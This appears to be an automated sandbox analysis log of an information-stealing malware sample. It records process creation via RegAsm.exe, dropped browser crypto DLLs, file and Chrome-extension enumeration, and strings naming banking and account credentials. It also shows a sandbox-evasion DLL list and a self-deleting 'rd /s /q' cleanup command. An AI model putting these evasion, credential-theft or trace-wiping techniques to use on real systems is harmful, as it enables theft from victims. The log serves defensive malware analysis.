                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: sqlx[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB5CE8 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004191D5 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7EB536 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\nss3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\nss3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\nss3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.7 %
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 5820Thread sleep count: 88 > 30
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC5AC6 FindFirstFileExW,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FE81 GetSystemInfo,wsprintfA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: JDGCGD.2.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: JDGCGD.2.dr | Binary or memory string: discord.comVMware20,11696428655f
                  Source: JDGCGD.2.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: JDGCGD.2.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: JDGCGD.2.dr | Binary or memory string: global block list test formVMware20,11696428655
                  Source: JDGCGD.2.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000EE3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: JDGCGD.2.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: JDGCGD.2.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: JDGCGD.2.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
